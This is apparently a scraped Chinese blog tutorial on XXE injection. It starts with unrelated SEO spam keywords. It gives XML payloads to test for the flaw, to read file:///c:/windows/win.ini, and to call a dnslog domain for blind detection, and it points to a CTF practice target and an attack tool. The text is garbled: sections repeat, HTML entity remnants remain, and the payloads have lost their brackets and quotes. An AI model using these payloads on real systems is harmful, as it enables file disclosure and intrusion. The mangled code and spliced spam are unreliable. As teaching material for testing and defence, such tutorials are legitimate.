做最好的在线看片网站,深圳企业网站模板,用手机制作表格的软件,网站建设要域名和什么科目一、概述
1、XXE#xff1a;XML外部实体注入攻击
2、XML#xff1a;可扩展标记语言。
(1)没有固定标签#xff0c;所有标签都可以自定义#xff0c;但有限制规则。
(2)用于数据对的传输与存储#xff0c;常被用于充当配置文件
推荐教程#xff1a;XML 教程
(3)后缀…一、概述
1、XXEXML外部实体注入攻击
2、XML可扩展标记语言。
(1)没有固定标签所有标签都可以自定义但有限制规则。
(2)用于数据对的传输与存储常被用于充当配置文件
推荐教程XML 教程
(3)后缀名*.xml
(4)语法规则格式正确完整
3、XXE攻击原理攻击者通过恶意的外部实体当解析者解析包含恶意外部实体且未对其进行过滤造成命令执行目录遍历。
二、利用
1、存在
看URL是.ashx后缀存在明显的XML标签是POST请求content-typeapplication/xml、text/xml、application/json(发现更改为application/xml看看)
2、限制条件是否开启外部实体解析
3、攻击方式有回显和无回显(盲攻击)
4、Payload
#尝试判断漏洞存在
?xml version1.0?
!DOCTYPE info [
!ENTITY xxe 你好 ]
infoxxe;/info
#利用
?xml version1.0 encodingutf-8 ?
!DOCTYPE foo [
!ENTITY xxe SYSTEM
file:///c:/windows/win.ini
]
fooxxe;/foo 5、利用dnslog判断是否存在xxe漏洞(靶场pikachu-xxe漏洞)
(1)、修改payload
?xml version1.0 encodingutf-8 ?
!DOCTYPE info [
!ENTITY xxe SYSTEM
http://dnslog.cn暂时域名
]
infoxxe;/info(2)、回到dnslog网址看是否有域名解析了 6、练习(ctf题目)http://web.jarvisoj.com:9882/
7、思路
无回显BP抓包判断是否存在xxe漏洞深度利用
三、补充
1、工具XXE injector
资料https://www.cnblogs.com/AgainKjh/p/14639186.html
2、防御
升级版本禁止外部实体解析过滤用户提交的数据
